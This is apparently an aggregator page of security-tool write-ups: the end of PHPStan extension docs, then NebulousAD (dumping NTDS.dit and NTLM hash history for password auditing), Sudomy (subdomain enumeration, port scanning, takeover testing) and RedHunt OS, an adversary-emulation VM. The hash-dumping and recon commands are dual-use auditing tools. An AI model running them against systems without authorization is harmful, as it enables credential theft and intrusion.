use PHPStan\Analyser\Scope;
use PHPStan\Analyser\SpecifiedTypes;
use PHPStan\Analyser\TypeSpecifierContext;
use PHPStan\Reflection\MethodReflection;

interface StaticMethodTypeSpecifyingExtension
{

public function getClass(): string;

public function isStaticMethodSupported(MethodReflection $staticMethodReflection, StaticCall $node, TypeSpecifierContext $context): bool;

public function specifyTypes(MethodReflection $staticMethodReflection, StaticCall $node, Scope $scope, TypeSpecifierContext $context): SpecifiedTypes;

}
And this is how you'd write the extension for the second example above:
public function getClass(): string
{
return \PHPUnit\Framework\Assert::class;
}

public function isStaticMethodSupported(MethodReflection $staticMethodReflection, StaticCall $node, TypeSpecifierContext $context): bool;
{
// The $context argument tells us if we're in an if condition or not (as in this case).
return $staticMethodReflection->getName() === 'assertNotNull' && $context->null();
}

public function specifyTypes(MethodReflection $staticMethodReflection, StaticCall $node, Scope $scope, TypeSpecifierContext $context): SpecifiedTypes
{
// Assuming extension implements \PHPStan\Analyser\TypeSpecifierAwareExtension.
return $this->typeSpecifier->create($node->var, \PHPStan\Type\TypeCombinator::removeNull($scope->getType($node->var)), $context);
}
And finally, register the extension to PHPStan in the project's config file:
services:
-
class: App\PHPStan\AssertNotNullTypeSpecifyingExtension
tags:
- phpstan.typeSpecifier.staticMethodTypeSpecifyingExtension
There's also an analogous functionality for:
  • dynamic methods using MethodTypeSpecifyingExtension interface and phpstan.typeSpecifier.methodTypeSpecifyingExtension service tag.
  • functions using FunctionTypeSpecifyingExtension interface and phpstan.typeSpecifier.functionTypeSpecifyingExtension service tag.

Building
You can either run the whole build including linting and coding standards using
vendor/bin/phing
or run only tests using
vendor/bin/phing tests


NebulousAD - Automated Credential Auditing Tool

$
0
0

NebulousAD Automated Credential Auditing Tool.

Installation
Simply download the precompiled release (requires no python interpreter), or build from source:
Requires Python2.7 (for now)
Run git clone git@github.com:NuID/nebulousAD.git
Next, install with python setup.py install
Then initialize your key. You can get your key by visiting: https://nebulous.nuid.io/#/register Once registered, click the button to generate your API key and copy it.
Now you can initialize them like so: nebulousAD -init-key <api_key>
You can now run the tool. If it can't find your API key, you may need to restart your terminal session. The API key is stored in an environment variable. Logging out and back in also works.

Usage
Example to dump all hashes and check them against NuID's api: nebulousAD.exe -v -snap -check
NuID Credential Auditing tool.

optional arguments:
-h, --help show this help message and exit
-ntds NTDS NTDS.DIT file to parse
-system SYSTEM SYSTEM registry hive to parse
-csv CSV Output results to CSV file at this PATH.
-json JSON Output results to JSON file at this PATH
-init-key INIT_KEY Install your Nu_I.D. API key to the current users
PATH.
-c, -check Check against Nu_I.D. API for compromised
credentials.
-snap Use ntdsutil.exe to snapshot the system registry
hive and ntds.dit file to <systemDrive>:\NuID\
-shred When performing delete o perations on files, use a 7
pass overwrite with sdelete.exe. Download here:
https://docs.microsoft.com/en-
us/sysinternals/downloads/sdelete
-no-backup Do not backup the existing snapshots, just overwrite
them instead.
-clean-old-snaps CLEAN_OLD_SNAPS
Clean backups older than N days.

display options:
-user-status Display whether or not the user is disabled
-pwd-last-set Shows pwdLastSet attribute for each account found
within the NTDS.DIT database.
-history Dump NTLM hash history of the users.
-v Enable verbose mode.

-snap
The -snap param will automatically snapshot Active Directory (using ntdsutil.exe), and dump the ntds.dit file as well as the SYSTEM registry hive, if you have the privledges. You can dump this manually using any variety of methods or the ntdsutil.exe tool.
If dumping manually you can point to the files with -system path\to\SYSTEM and -ntds path\to\ntds.dit. This is useful if you want to audit old snapshots.

-check
This requires an API key from https://nebulous.nuid.io/#/register. Once you have that and installed with -init-key, you can check the hashes against the NuID API. If you have specified -history it will also check each accounts password history to see if there was a password the user previously used that was compromised.

-user-status
Adds output indicating whether or not the account is Enabled or Disabled in Active Directory

-pwd-last-set
Adds output indicating the date the account's password was last set. This can be useful in detecting violations of security policy of accounts that do not get reset automatically as defined in GPO, such as Service Accounts.

-history
Also audit or dump the accounts stored password history

-shred
Use a DoD 7 pass overwrite when wiping snapshots. This requires having sdelete.exe in your path. You can get that here: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
Just download that and place it in your %SYSTEMDRIVE\Windows\System32\ directory, or setup the environment variable.

-clean-old-snaps
Useful on cleaning backups when setting this application to run with the Task Scheduler. The SYSTEM hive and .dit file can be rather large in bigger domains and take a good amount of disk space. If you use Task Scheduler to make a daily audit, you can use this option like so: -clean-old-snaps 7 to only store 1 weeks worth of snapshots.

-no-backup
If we detect an old snapshot, we back it up to %SYSTEMDRIVE%\Program Files\NuID\snapshot-backups by default. This is due to ntdsutil.exe requiring an empty directory. If you want to disable this backup and just wipe the current snapshot, use this argument.


Sudomy - Subdomain Enumeration & Analysis

$
0
0

Sudomy is a subdomain enumeration tool, created using a bash script, to analyze domains and collect subdomains in fast and comprehensive way.

Features

For recent time, Sudomy has these 9 features:
  • Easy, light, fast and powerful. Bash script is available by default in almost all Linux distributions. By using bash script multiprocessing feature, all processors will be utilized optimally.
  • Subdomain enumeration process can be achieved by using active method or passive method
    • Active Method
      • Sudomy utilize Gobuster tools because of its highspeed performance in carrying out DNS Subdomain Bruteforce attack (wildcard support). The wordlist that is used comes from combined SecList (Discover/DNS) lists which contains around 3 million entries
    • Passive Method
      • By selecting the third-party sites, the enumeration process can be optimized. More results will be obtained with less time required. Sudomy can collect data from these well-curated 16 third-party sites:
          https://dnsdumpster.com
        https://web.archive.org
        https://shodan.io
        https://virustotal.com
        https://crt.sh
        https://www.binaryedge.io
        https://securitytrails.com
        https://sslmate.com/certspotter
        https://censys.io
        https://threatminer.org
        http://dns.bufferover.run
        https://hackertarget.com
        https://www.entrust.com/ct-search/
        https://www.threatcrowd.org
        https://riddler.io
        https://findsubdomains.com
  • Test the list of collected subdomains and probe for working http or https servers. This feature uses a third-party tool, httprobe.
  • Subdomain availability test based on Ping Sweep and/or by getting HTTP status code.
  • The ability to detect virtualhost (several subdomains which resolve to single IP Address). Sudomy will resolve the collected subdomains to IP addresses, then classify them if several subdomains resolve to single IP address. This feature will be very useful for the next penetration testing/bug bounty process. For instance, in port scanning, single IP address won’t be scanned repeatedly
  • Performed port scanning from collected subdomains/virtualhosts IP Addresses
  • Testing Subdomain TakeOver attack
  • Taking Screenshotsof subdomains
  • Report output in HTML or CSV format

How Sudomy Works
Sudomy is using cURL library in order to get the HTTP Response Body from third-party sites to then execute the regular expression to get subdomains. This process fully leverages multi processors, more subdomains will be collected with less time consumption.

Comparison
The following are the results of passive enumeration DNS testing of Sublist3r, Subfinder, and Sudomy. The domain that is used in this comparison is bugcrowd.com.
SudomySubfinderSublister

Asciinema :

Installation
Sudomy is currently extended with the following tools. Instructions on how to install & use the application are linked below.
ToolsLicenseInfo
GobusterApache License 2.0not mandatory
httprobeTom Hudson -mandatory
nmapGNU General Public License v2.0not mandatory

Dependencies
$ pip install -r requirements.txt
Sudomy requires jq to run and pars. For more information, Download and install jq here
# Linux
=======
apt-get install jq nmap phantomjs

# Mac
brew cask install phantomjs
brew install jq nmap
If you have a Go environment ready to go, it's as easy as:
export GOPATH=$HOME/go
export PATH=$PATH:$GOROOT/bin:$GOPATH/bin
go get -u github.com/tomnomnom/httprobe
go get -u github.com/OJ/gobuster
Download Sudomy From Github
# Clone this repository
git clone --recursive https://github.com/screetsec/Sudomy.git

# Go into the repository
sudomy --help

Running in a Docker Container
# Pull an image from DockerHub
docker pull screetsec/sudomy:v1.1.0

# Run an image, you can run the image on custom directory but you must copy/download config sudomy.api on current directory
docker run -v "${PWD}/output:/usr/lib/sudomy/output" -v "${PWD}/sudomy.api:/usr/lib/sudomy/sudomy.api" -it --rm screetsec/sudomy:v1.1.0 [argument]

Post Installation
API Key is needed before querying on third-party sites, such as Shodan, Censys, SecurityTrails, Virustotal, and BinaryEdge.
  • The API key setting can be done in sudomy.api file.
# Shodan
# URL : http://developer.shodan.io
# Example :
# - SHODAN_API="VGhpc1M0bXBsZWwKVGhmcGxlbAo"

SHODAN_API=""

# Censys
# URL : https://censys.io/register

CENSYS_API=""
CENSYS_SECRET=""

# Virustotal
# URL : https://www.virustotal.com/gui/
VIRUSTOTAL=""


# Binaryedge
# URL : https://app.binaryedge.io/login
BINARYEDGE=""


# SecurityTrails
# URL : https://securitytrails.com/
SECURITY_TRAILS=""

Usage
 ___         _ _  _
/ __|_ _ __| (_)(_)_ __ _ _
\__ \ || / _ / __ \ ' \ || |
|___/\_,_\__,_\____/_|_|_\_, |
|__/ v{1.1.0#dev} by @screetsec
Sudomy - Fast Subdmain Enumeration and Analyzer
http://github.com/screetsec/sudomy

Usage: sudomy.sh [-h [--help]] [-s[--source]][-d[--domain=]]

Example: sudomy.sh -d example.com
sudomy.sh -s Shodan,VirusTotal -d example.com
sudomy.sh -pS -rS -sC -nT -sS -d example.com

Optional Arguments:
-a, --all Running all Enumeration, no nmap & gobuster
-b, --bruteforce Bruteforce Subdomain Using Gobuster (Wordlist: ALL Top SecList DNS)
-d, --domain domain of the website to scan
-h, --help show this help message
-o, --html Make report output into HTML
-s, --source Use source for Enumerate Subdomain
-tO, --takeover Subdomain TakeOver Vulnerabilty Scanner
-pS, --ping-sweep Check live host using methode Ping Sweep
-rS, --resolver Convert domain lists to resolved IP lists without duplicates
-sC, --status-code Get status codes, response from domain list
-nT, --nmap-top Port scanning with top-ports using nmap from domain list
-sS, --screenshot Screenshots a list of website
-nP, --no-passive Do not perform passive subdomain enumeration
--no-probe Do not perform httprobe
To use all 16 Sources and Probe for working http or https servers:
 ___         _ _  _
/ __|_ _ __| (_)(_)_ __ _ _
\__ \ || / _ / __ \ ' \ || |
|___/\_,_\__,_\____/_|_|_\_, |
|__/ v{1.1.0#dev} by @screetsec
Sudomy - Fast Subdmain Enumeration and Analyzer
http://github.com/screetsec/sudomy

Usage: sudomy.sh [-h [--help]] [-s[--source]][-d[--domain=]]

Example: sudomy.sh -d example.com
sudomy.sh -s Shodan,VirusTotal -d example.com
sudomy.sh -pS -rS -sC -nT -sS -d example.com

Optional Arguments:
-a, --all Running all Enumeration, no nmap & gobuster
-b, --bruteforce Bruteforce Subdomain Using Gobuster (Wordlist: ALL Top SecList DNS)
-d, --domain domain of the website to scan
-h, --help show this help message
-o, --html Make report output into HTML
-s, --source Use source for Enumerate Subdomain
-tO, --takeover Subdomain TakeOver Vulnerabilty Sca nner
-pS, --ping-sweep Check live host using methode Ping Sweep
-rS, --resolver Convert domain lists to resolved IP lists without duplicates
-sC, --status-code Get status codes, response from domain list
-nT, --nmap-top Port scanning with top-ports using nmap from domain list
-sS, --screenshot Screenshots a list of website
-nP, --no-passive Do not perform passive subdomain enumeration
--no-probe Do not perform httprobe
To use one of more source:
$ sudomy -d hackerone.com
To use one or more plugins:
$ sudomy -s shodan,dnsdumpster,webarchive -d hackerone.com
To use all plugins: testing host status, http/https status code, subdomain takeover and screenshots
$ sudomy -pS -sC -sS -d hackerone.com
To create report in HTML Format
$ sudomy --all -d hackerone.com
HTML Report Sample:
DashboardReports

Tools Overview
  • Youtube Videos : Click here

Translations

Changelog
All notable changes to this project will be documented in this file.

Credits & Thanks


RedHunt OS v2 - Virtual Machine For Adversary Emulation And Threat Hunting

$
0
0

Virtual Machine for Adversary Emulation and Threat Hunting by RedHunt Labs
RedHunt OS aims to be a one stop shop for all your threat emulation and threat hunting needs by integrating attacker's arsenal as well as defender's toolkit to actively identify the threats in your environment.

Base Machine:
  • Lubuntu-18.04 x64

Tool Setup

Attack Emulation:

Threat HUNTing:

Open Source Intelligence (OSINT):

Threat Intelligence:

Reporting:

VM Download Link:
Changelog
  • System Updates
  • Tool Updates
  • New Categories added: Reporting
  • Outdated tools removed
  • Base OS Updated to 18.04
Setup:
VM Credentials: Username: hunter Password: hunter
Caldera Credentials: Username: admin Password: caldera

Checksums:
Version 1
  • MD5: f8d433140f7e2b370b81c8b6ed3c951f
  • SHA1: 66b6a9bdbd2c6f029de9d17a2e086166a1ab7fd3

Sneak Peek:





To-Do:

Website:

Twitter:

References:


Viewing all 5844 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>